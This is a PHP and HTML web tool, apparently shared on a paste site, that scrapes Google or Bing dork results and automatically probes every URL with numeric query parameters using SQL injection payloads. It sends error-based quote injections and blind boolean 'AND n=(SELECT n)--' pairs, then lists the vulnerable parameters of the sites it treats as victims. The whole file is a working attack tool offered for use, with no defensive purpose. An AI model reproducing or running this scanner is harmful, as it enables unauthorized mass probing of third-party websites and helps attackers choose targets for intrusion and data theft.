google bypass

1. <?php
2. /* Google dork scanner
3. * yepss... you know what this is
4. *
5. */
6.  
7.  
8. @error_reporting(0);
9. @set_time_limit(60);
10.  
11. function fetch($url) {
12. if(!function_exists("curl_init")){
13. $bu = trim(@file_get_contents($url));
14. if($bu == "") return "";
15. else return $bu;
16. }
17.  
18. $header[] = "Accept-Language: en";
19. $header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3";
20. $header[] = "Connection: Keep-Alive";
21. $header[] = "Pragma: no-cache";
22. $header[] = "Cache-Control: no-cache";
23.  
24. $ch = curl_init();
25. curl_setopt($ch, CURLOPT_URL, $url);
26. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
27. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE );
28. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
29. curl_setopt($ch, CURLOPT_TIMEOUT, 7);
30. curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
31. $content = curl_exec($ch);
32. curl_close($ch);
33. return $content;
34. }
35.  
36. function sqlcheck($url_){
37. // clean url
38. $url_ = "http://".trim(str_ireplace("http://","",$url_));
39. $url_ = str_ireplace("&amp;","&",$url_);
40. $urls = explode("?",$url_);
41. // check if url contains querystring
42. if(count($urls)==2){
43. $url = $urls[0];
44. $querys = explode("&",$urls[1]);
45. foreach($querys as $query){
46. $vars = explode("=",$query);
47. //echo $query;
48. // check if parameter has a numeric value
49. if((count($vars)>=2) && (is_numeric($vars[1]))){
50. $final = str_replace($query,$query."%27",$url_);
51. //echo $final;
52. $content = fetch($final);
53. if(preg_match("/sql syntax|sql error|right syntax to use near|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content)){
54. return $vars[0];
55. }
56. }
57. }
58. }
59. return ""; // gagal son
60. }
61. function sqlheavycheck($url_){
62. // clean url
63. $url_ = "http://".trim(str_ireplace("http://","",$url_));
64. $url_ = str_ireplace("&amp;","&",$url_);
65.  
66. // check if url contains querystring
67. $pos = stripos($url_,"?");
68. if($pos !== false){
69. $url = substr($url_,0,$pos);
70. $que = substr($url_,$pos+1);
71.  
72.  
73. $querys = explode("&",$que);
74. foreach($querys as $query){
75. $vars = explode("=",$query);
76. //echo $query;
77. // check if parameter has a numeric value
78. if((count($vars)>=2) && (is_numeric($vars[1]))){
79. // and 1=(select 1)
80. $acak = rand(1111,9999);
81. $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_);
82. $contrue = fetch($final);
83. //echo "final1 : ".$final."<br />";
84.  
85. // and 1=(select 0)
86. $acak = rand(1111,9999);
87. $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_);
88. //echo "final2 : ".$final."<br />";
89. $confalse = fetch($final);
90.  
91. $numtrue = strlen(strip_tags($contrue));
92. $numfalse = strlen(strip_tags($confalse));
93. $selisih = $numtrue - $numfalse;
94.  
95.  
96. if($selisih >= 30){
97. return $vars[0];
98. }
99. else{
100. //' and 1=(select 1) and '1'='1
101. $acak = rand(1111,9999);
102. $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_);
103. $contrue = fetch($final);
104. //echo "final1 : ".$final."<br />";
105.  
106. //' and 1=(select 0) and '1'='1
107. $acak = rand(1111,9999);
108. $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_);
109. //echo "final2 : ".$final."<br />";
110. $confalse = fetch($final);
111.  
112. $numtrue = strlen(strip_tags($contrue));
113. $numfalse = strlen(strip_tags($confalse));
114. $selisih = $numtrue - $numfalse;
115.  
116. if($selisih >= 30){
117. return $vars[0];
118. }
119. }
120. }
121. }
122. }
123. return ""; // gagal son...
124. }
125.  
126.  
127. // debugging tools
128. if(isset($_GET['check'])&&($_GET['check']!="")){
129. $url = $_GET['check'];
130. echo $url." ".sqlcheck($url);
131. die();
132. }
133. if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){
134. $url = $_GET['heavycheck'];
135. echo $url." ".sqlheavycheck($url);
136. die();
137. }
138. // debugging tools end
139.  
140.  
141. if(isset($_GET['dork'])&&($_GET['dork']!="")){
142. $gnum = 10; // jumlah hasil pencarian perhalaman
143. $setype = "google"; // default cari pakek g00gle
144. if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype']));
145.  
146. if(isset($_GET['page'])){
147. $gpage = (int) $_GET['page'];
148. if($gpage < 1) $gpage = 1;
149. }
150. else $gpage = 1;
151. $gpage = ($gpage - 1) * $gnum;
152.  
153. if($gpage > ($gpage * $gnum)){
154. echo "_finish_|max only ".$gpage." results";
155. die();
156. }
157.  
158. $dork = stripslashes($_GET['dork']);
159. $dork = str_replace(" ","+",$dork);
160. $dorki = urlencode($dork);
161.  
162. if($setype == "google"){
163. //g00gle nextbuttn---> <div class=med style=margin-top:2em>
164. $gsearch = fetch("http://www.google.com/custom?num=".$gnum."&hl=en&cx=!009136828022434855111:b1vm8yfl888&q=".$dorki."&start=".$gpage."&sa=N");
165. $raws = explode("<h2 class=r>",$gsearch);
166. if((trim($gsearch) == "") || (count($raws) <= 1) || (preg_match("/div\sclass=med\sstyle=margin-top:2em/i",$gsearch))){
167. echo "_finish_|no more search results from ".$setype;
168. die();
169. }
170.  
171. }
172. elseif($setype == "bing"){
173. //bing nextbutton---> class="sb_pagN"
174. $dorki = preg_replace("/^[^:]*:(.*)/i","\\1",$dork);
175. $gsearch = fetch("http://www.bing.com/search?q=".$dorki."&filt=all&first=".$gpage."&FORM=PERE3");
176. $raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch);
177. if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){
178. echo "_finish_|no more search results from ".$setype;
179. die();
180. }
181. }
182. else{
183. echo "_finish_|search engine not supported";
184. die();
185. }
186.  
187. foreach($raws as $korban){
188. if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){
189. $heavy = false;
190. if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true;
191.  
192. $calon = substr($korban,9);
193. $pos = strpos($calon,"\"");
194. if($pos !== false){
195. $url = trim(substr($calon,0,$pos));
196. if(preg_match("/facebook\.|yahoo\.|google\.|youtube\./i",$url)) continue;
197. if(!preg_match("/\w+=\d+/i",$url)) continue;
198.  
199. if($heavy) {
200. $vulnvar = sqlheavycheck($url);
201. if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
202. else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
203. echo $laporan;
204.  
205. }
206. else{
207. $vulnvar = sqlcheck($url);
208. if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
209. else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
210. echo $laporan;
211. }
212. }
213. }
214. }
215. die(); // mas kamu koq looyo...
216. }
217.  
218.  
219.  
220. ?><html>
221. <head><title>SQLi Scanner</title>
222. <link rel="shortcut icon" href="../favicon.ico">
223. <!-- <?php echo date("Y",time()); ?> Revan Aditya -->
224. <script type="text/javascript">
225. jalan = false;
226. nomer = 1;
227. nomermax = 100;
228. heavy = false;
229.  
230. function ajax(vars, nom, cbFunction){
231. var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
232. var querystring = '?' + vars + '&page=' + nom;
233. req.open("GET", querystring , true);
234. req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
235. req.onreadystatechange = function(){
236. if (req.readyState == 4 && req.status == 200){
237. if (req.responseText){
238. cbFunction(req.responseText,vars);
239. }
240. }
241. }
242. req.send(null);
243. }
244. function showResult(str, vars){
245. var box = document.getElementById("result")
246. if(str.match(/Warning|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />';
247. else box.innerHTML += str;
248.  
249. if(!jalan){
250. box.innerHTML += '<span class=\"red\">*** </span> paused...<br />';
251. document.getElementById("loading").style.visibility = 'hidden';
252. document.getElementById("btnOk").value = "Resume";
253. }
254. else {
255. if(!str.match(/.*finish.*/gi)){
256. sqlCheck(vars);
257. }
258. else{
259. var pesan = str.substring(str.indexOf("|") + 1);
260. box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />';
261. document.getElementById('setype').disabled = false;
262. document.getElementById('dork').readOnly = false;
263. document.getElementById("loading").style.visibility = 'hidden';
264. document.getElementById("btnOk").value = "Search";
265. nomer = 1;
266. jalan = false;
267. }
268. }
269.  
270. var oldYPos = 0, newYPos = 0;
271. do{
272. if (document.all){
273. oldYPos = document.body.scrollTop;
274. }
275. else{
276. oldYPos = window.pageYOffset;
277. }
278. window.scrollBy(0, 50);
279. if (document.all){
280. newYPos = document.body.scrollTop;
281. }
282. else{
283. newYPos = window.pageYOffset;
284. }
285. } while (oldYPos < newYPos);
286. }
287. function keyHandler(ev){
288. if (!ev){
289. ev = window.event;
290. }
291. if (ev.which){
292. keycode = ev.which;
293. }
294. else if (ev.keyCode){
295. keycode = ev.keyCode;
296. }
297. if (keycode == 13){
298. sikat();
299. }
300. }
301. String.prototype.trim = function() {
302. return this.replace(/^\s*|\s*$/g, "");
303. }
304. function sqlCheck(xdata){
305. if(jalan){
306. ajax(xdata, nomer, showResult);
307. nomer++;
308. }
309. }
310. function sqlHeavyCheck(xdata){
311. if(jalan){
312. ajax(xdata + '&heavy=1', nomer, showResult);
313. nomer++;
314. }
315. }
316. function sikat(){
317. var btext = document.getElementById("btnOk");
318. if((btext.value == 'Search') || (btext.value == 'Resume')){
319. if(!jalan){
320. if(btext.value == 'Search') nomer = 1;
321. var target = document.getElementById('dork');
322. var setype = document.getElementById('setype');
323. if(target.value.trim().length>0) {
324. document.getElementById("loading").style.visibility = 'visible';
325. document.getElementById("btnOk").value = "Pause";
326. target.readOnly = true;
327. setype.disabled = true;
328. jalan = true;
329. sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value));
330. }
331. }
332. else alert("Please stop first...");
333. }
334. else {
335. berhenti();
336. }
337. }
338. function initpg(){
339. document.onkeypress = keyHandler;
340. }
341. function berhenti(){
342. jalan = false;
343. }
344. function bersih(){
345. var tanya = confirm("Clear results and restart?");
346. if(tanya == true) location.href = 'index.php';
347. }
348. function checkheavy_fix(){
349. var heavyval = document.getElementById("heavy");
350. if(heavyval.checked) heavyval.checked = false;
351. else heavyval.checked = true;
352. checkheavy();
353. }
354. function checkheavy(){
355. var heavyval = document.getElementById("heavy").checked;
356. var box = document.getElementById("result")
357. if(heavyval) {
358. heavy = true;
359. box.innerHTML += '<span class=\"red\">*** </span> depth scan...<br />';
360. }
361. else {
362. heavy = false;
363. box.innerHTML += '<span class=\"red\">*** </span> quick scan...<br />';
364. }
365. }
366.  
367. </script>
368. <style type="text/css">
369. *{
370. background:url('../images/bg.gif') #111;
371. font-family: Lucida Console,Tahoma;
372. color:#bbb;
373. font-size:11px;
374. text-align:left;
375. }
376. input,select,textarea{
377. border:0;
378. border:1px solid #900;
379. color:#fff;
380. background:#000;
381. margin:0;
382. padding:2px 4px;
383. }
384. input:hover,textarea:hover,select:hover{
385. background:#200;
386. border:1px solid #f00;
387. }
388. option{
389. background:#000;
390. }
391. .red{
392. color:#f00;
393. }
394. .white{
395. color:#fff;
396. }
397. a{
398. text-decoration:none;
399. }
400. a:hover{
401. border-bottom:1px solid #900;
402. border-top:1px solid #900;
403. }
404. #status{
405. width:100%;
406. height:auto;
407. padding:4px 0;
408. border-bottom:1px solid #300;
409. }
410. #result a{
411. color:#777;
412. }
413. .sign{
414. color:#222;
415. }
416. #box{
417. margin:10px 0 0 0;
418. }
419. </style>
420. </head>
421. <body onload="initpg();">
422.  
423.  
424.  
425. <div id="result"></div>
426. <div id="box">
427. <input type="text" name="dork" id="dork" value="" style="width:400px;" title="Give a keyword to search..." />
428. <select name="setype" id="setype">
429. <option value="google" />Google</option>
430. <option value="bing" />Bing</option>
431. </select>
432. <input type="submit" id="btnOk" name="btnOk" value="Search" onclick="sikat();" style="width:70px;text-align:center;" />
433. <input type="submit" name="btnClear" value="Restart" onclick="bersih();" style="width:70px;text-align:center;" />
434. <span class="sign">revres</span><span class="red">.</span><span class="sign">tanur</span>
435. <img src="../images/loading.gif" alt="" style="margin:0;padding:0;vertical-align:middle;visibility:hidden;" id="loading" title="loading..." />
436. <p><input onclick="checkheavy();" style="vertical-align:middle;margin:0 8px;padding:0;border:0;" type="checkbox" name="heavy" id="heavy" /><a style="vertical-align:middle;" href="javascript:checkheavy_fix();">Depth scan ( slow but sure )</a></p>
437. </div>
438.  
439.  
440. <!-- aku suka kamu suka sudah jangan bilang syapaa syapaaa... -->
441. </body>
442. </html>